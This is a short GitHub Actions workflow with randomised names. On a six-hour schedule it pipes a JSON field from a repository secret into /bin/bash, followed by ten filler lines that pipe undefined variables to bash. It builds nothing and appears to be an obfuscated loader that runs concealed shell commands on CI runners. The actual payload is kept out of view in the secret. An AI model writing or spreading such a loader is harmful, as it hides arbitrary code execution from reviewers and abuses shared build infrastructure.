name: regulatehighjump
on:
  workflow_dispatch:
  schedule:
    - cron: '21 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: regulatehighjump
        env:
          fzte34099: ${{ secrets.fzte34099 }}
        run: |
          echo $fzte34099 | jq -r .qpoxg58832 | /bin/bash
          echo $dhtx2 | jq -r .pbif3 | /bin/bash
          echo $quxq42 | jq -r .teok23868 | /bin/bash
          echo $pahf66 | jq -r .axpbp5659 | /bin/bash
          echo $pcm37 | jq -r .ixzwr347 | /bin/bash
          echo $fp9 | jq -r .okyqv335 | /bin/bash
          echo $g5223 | jq -r .hd94726 | /bin/bash
          echo $dmpm0822 | jq -r .w206 | /bin/bash
          echo $l2 | jq -r .bzvmq5 | /bin/bash
          echo $pv039 | jq -r .jrzne0 | /bin/bash
          echo $p1694 | jq -r .awrwx992 | /bin/bash

